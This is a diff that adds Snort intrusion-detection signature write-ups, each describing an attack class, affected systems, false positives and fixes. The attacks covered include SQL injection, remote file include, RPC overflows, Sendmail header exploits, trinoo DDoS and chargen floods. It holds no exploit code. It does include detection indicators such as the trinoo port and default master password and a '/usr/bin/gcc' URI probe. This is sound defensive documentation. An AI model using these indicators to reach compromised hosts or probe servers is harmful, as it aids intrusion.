+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/1570.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1570
+
+--
+Summary:
+This event is generated when an attempt is made to access the file
+loadpage.cgi.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain access to the
+script loadpage.cgi, part of the CGI application AHG EZshopper running
+on a web server. Some applications do not perform stringent checks when
+validating the credentials of a client host connecting to the services
+offered on a host server. This can lead to unauthorized access and
+possibly escalated privileges to that of the administrator. Data stored
+on the machine can be compromised and trust relationships between the
+victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+
+	AHG EZshopper v3.0 and v2.0 for UNIX
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+NSFocus:
+http://www.nsfocus.com/english/homepage/research/0009.htm
+
+--
--- /dev/null
+++ b/doc/signatures/865.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+865
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2922.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+2922
+
+-- 
+Summary: 
+This event is generated when an inverse query attempt is made using TCP.
+
+-- 
+
+Impact: 
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Bind 8 contains a programming error that may present an attacker with
+the opportunity to execute code of their choosing on an affected server.
+
+The error occurs in the handling of malformed transactions. When using
+TCP this can result in the attacker causing a heap overflow.
+
+--
+Affected Systems:
+	Bind 8.
+
+--
+Attack Scenarios: 
+An attacker needs to send a specially crafted and malformed query to an
+affected server.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1341.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted gcc command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The gcc command is the GNU project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could possibly compile a program needed for other attacks on the system or install a binary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/usr/bin/gcc'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to prevent files from being added to the host. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
--- /dev/null
+++ b/doc/signatures/1484.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1484
+
+--
+Summary:
+This event is generated when an attempt is made to access the tstisapi.dll component associated with the Pi3Web software. 
+
+--
+Impact:
+Remote access.  Malicious access of the tstisapi.dll component can allow the execution of arbitrary commands on a vulnerable server.
+
+--
+Detailed Information:
+Pi3Web is a free configurable HTTP server available on Linux and Windows for cross platform Internet server development and deployment.  A buffer overflow vulnerability exists in tstisapi.dll that may permit execution of arbitrary commands on the victim server.
+
+--
+Affected Systems:
+Pi3Web 2.0
+
+--
+Attack Scenarios:
+An attacker can craft an overly long request for tstisapi.dll that may cause a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the vendor patch.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0142
+
+Bugtraq
+http://www.securityfocus.com/bid/3866
+
+--
--- /dev/null
+++ b/doc/signatures/1916.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1916
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a format
+string vulnerability associated with the Remote Procedure Call (RPC)
+rpc.statd.
+
+--
+Impact:
+Remote root access. This may permit execution of arbitrary commands with
+the privileges of root.
+
+--
+Detailed Information:
+The rpc.statd daemon is a component of Network File System (NFS) that
+implements the Network Status and Monitor (NSM) RPC functions.  NSM
+monitors the status of NFS clients and servers and maintains a list of
+hosts that have registered to be notified when an NFS host crashes. 
+There is a format string vulnerability associated with the code that
+implements the monitoring of a given host, possibly permitting the
+execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	Red Hat Linux 6.0, 6.1, 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can attempt to exploit the format string error allowing
+execution of arbitrary commands with the privileges of root.  
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2739.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2739
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_nvarchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000697.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000697
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VCard PRO" application running on a webserver. Access to the file "search.php" with SQL commands being passed as the "event_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "event_id" parameter in the "search.php" script used by the "VCard PRO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VCard PRO
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1868.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1868
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/662.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+662
+
+--
+Summary:
+This event is generated when maliciously formatted "mail from" text is supplied.
+
+--
+Impact:
+Attempted administrator access.  A successful attack can allow remote execution of commands with root privileges. 
+
+--
+Detailed Information:
+A vulnerability exists in older versions of Sendmail that incorrectly parses message headers.  This vulnerability can allow anattacker to execute arbitrary commands as root.
+
+--
+Affected Systems:
+Sendmail versions prior to 8.6.10 and any version based on 5.x.
+
+--
+Attack Scenarios:
+An attacker can craft a malicious mail header that executes a command. 
+
+--
+Ease of Attack:
+Easy.  Use a maliciously formatted header.
+ 
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to version 8.6.10 or higher of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2308
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
+
+Arachnids:
+http://www.whitehats.com/info/IDS119
+
+
+--
--- /dev/null
+++ b/doc/signatures/1580.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1580
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/234.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+234
+
+--
+Summary:
+This event is generated when a trinoo DDoS attacker host communicates with a master host.  
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a trinoo attacker. If the listed destination IP is in your network, it may be a trinoo master.
+
+--
+Detailed Information:
+The trinoo DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, attackers communicate with masters to direct them to launch attacks.  An attacker may communicate with a master via TCP destination port 27665 with a string of "g0rave" in the payload.  This string is the default master startup password.
+
+--
+Affected Systems:
+Any trinoo compromised host.
+
+--
+Attack Scenarios:
+A trinoo attacker will communicate with masters to direct them to launch attacks.
+
+--
+Ease of Attack:
+Simple. trinoo code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+SecurityFocus:
+http://www.securityfocus.com/archive/1/37706
+
+CERT:
+http://www.cert.org/incident_notes/IN-99-07.html#trinoo
+
+--
--- /dev/null
+++ b/doc/signatures/3041.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3041
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1714.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1714
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000771.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000771
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "results" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "results" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000417.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000417
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MyBloggie" application running on a webserver. Access to the file "scode.php" using a remote file being passed as the "mybloggie_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mybloggie_root_path" parameter in the "scode.php" script used by the "MyBloggie" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MyBloggie
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2195.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2195
+
+--
+Summary:
+This event is generated when an attempt is made to access alert.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in Sun Microsystems' Cobalt RaQ server appliance.
+
+--
+Impact:
+System integrity, possible denial of service.
+
+--
+Detailed Information:
+The alert.cgi file on Sun Microsystems' Cobalt RaQ web server appliance does not properly parse HTML tags submitted in URLs. This can allow a malicious user to use a specially crafted URL to execute JavaScript to place scripts or content on the web server. In addition, an overly long URL could be used to crash the server.
+
+--
+Affected Systems:
+Any Cobalt RaQ 2.0, 3.0, or 4.0 server appliance.
+
+--
+Attack Scenarios:
+An attacker crafts a URL with JavaScript and passes the content to alert.cgi on a vulnerable RaQ server. The server then executes the JavaScript included in the URL, placing malicious content on the web server. An attacker could also send an overly long URL to alert.cgi, which will crash the server.
+
+--
+Ease of Attack:
+Simple. Proof of concepts exist.
+
+--
+False Positives:
+If a legitimate remote user accesses alert.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Workarounds have been provided on the BugTraq mailing list. See http://marc.theaimsgroup.com/?l=bugtraq&m=101500887122597&w=2 for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4211
+
+--
--- /dev/null
+++ b/doc/signatures/1271.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+1271
+
+--
+Summary:
+This event is generated when an attempt is made to probe a host for the
+rusers RPC service.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+The rusers RPC service is used to remotely list all logged in users on a
+machine. This information may be useful to an attacker when targeting a
+remote host.
+
+--
+Affected Systems:
+	All systems running the rusers RPC service
+ 
+--
+Attack Scenarios:
+An attacker runs a vulnerability assessment tool, or the standard Unix
+rusers command.  The attacker may use information gleaned from this to
+better target his attacks.
+
+--
+Ease of Attack:
+Simple. Tools to probe the rusers service come standard with most Unix variants.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the rusers service.
+
+Disallow access to RPC services from hosts external to the protected
+network
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1908.txt
@@ -0,0 +1,70 @@
+Rule:
+
+Sid:
+1909
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) Calendar
+Manager Service daemon, cmsd.
+
+--
+Impact:
+Remote root access. The attack may allow execution of arbitrary commands
+with the privileges of root.
+
+--
+Detailed Information:
+The cmsd RPC service implements the Calendar Manager Service daemon that
+is often distributed with the Common Desktop Environment (CDE) and Open
+Windows. The Calendar Manager daemon provides appointment and scheduling
+functions for CDE. A buffer overflow exists in the rtable_insert()
+function because of improper bounds checking, allowing the execution of
+arbitrary commands with the privileges of root.  One possible exploit
+vector is by inserting appointments into the Calendar Manager database.
+ 
+--
+Affected Systems:
+	SCO Open UNIX 8.0
+	SCO UnixWare 7.1.1
+	HP-UX 10.20, 10.24, 10.30, 11.0
+	Sun Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, 7.0
+	Sun SunOS 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+The attacker can use the exploit code to overflow the buffer allowing
+execution of arbitrary commands with the privileges of root.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/271.txt
@@ -0,0 +1,67 @@
+Rule:  
+--
+Sid:
+271
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of
+Service attack against a host or network by generating traffic between 
+your udp echo port and their udp chargen port.
+
+--
+Impact:
+Potential Denial of service (DoS) condition for the target host, hosts
+between the target host and the attacker, and more.
+
+--
+Detailed Information:
+Traffic was detected between the udp echo port on a host on the
+protected network and the udp chargen (character generator) service.  
+Due to the connectionless nature of udp, a single packet from the udp chargen
+service to a listening udp echo service will result in mass quantities
+of traffic back and forth between the two services.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+An attacker will find a host that still provides the udp chargen service
+and generate traffic between it and the udp echo service on a machine.
+If proper ingress/egress filtering is not in place, this traffic can be 
+trivially spoofed provided the attacker has elevated privledges on the 
+attacking/initiating machine (the source port being less than 1024).
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the chargen service unless it is absolutely needed, and apply
+ingress and egress filtering.
+
+Additionally, disable the udp echo service.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
